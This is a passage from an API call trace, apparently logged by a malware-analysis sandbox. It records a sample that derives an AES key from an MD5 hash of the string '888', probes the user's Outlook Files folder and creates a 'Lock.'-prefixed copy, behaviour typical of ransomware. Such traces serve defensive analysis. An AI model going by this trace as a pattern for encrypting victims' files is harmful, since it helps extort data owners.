out: lpMsg=0x8cf158) returned 0 [0219.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.656] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.656] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.656] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.656] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.656] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.656] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0219.656] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.656] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0219.657] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.657] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0219.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaba88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0219.657] CryptCreateHash (in: hProv=0xa7c908, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0219.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0219.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a726a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0219.657] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0219.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0219.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72738, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0219.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.657] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.657] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.657] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.657] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.657] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0219.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabb60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0219.658] CryptHashData (hHash=0x9e21f8, pbData=0x2a72628, dwDataLen=0x3, dwFlags=0x1) returned 1 [0219.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.658] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.658] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.658] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0219.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.658] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0219.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0219.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0219.658] CryptDeriveKey (in: hProv=0xa7c908, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0219.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.659] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.659] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.659] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.659] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.659] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.659] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0219.659] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.659] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0219.659] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0219.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0219.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0219.659] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0219.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865490 [0219.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0219.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0219.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd10 [0219.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0219.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabaa0 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcf8 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabaa0 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabab8 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0219.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0219.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0219.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0219.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0219.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.661] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Outlook Files" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0219.661] GetLastError () returned 0x5 [0219.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0219.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3855010 | out: hHeap=0x2af0000) returned 1 [0219.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0219.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0219.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0219.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0219.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0219.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0219.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b00 [0219.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.663] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0219.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854b00 | out: hHeap=0x2af0000) returned 1 [0219.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0219.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0219.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0219.663] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.Outlook Files" (normalized: "c:\\users\\fd1hvy\\documents\\lock.outlook files"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0219.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0219.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0219.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0219.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0219.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0219.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0219.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.666] RtlAllocateHeap 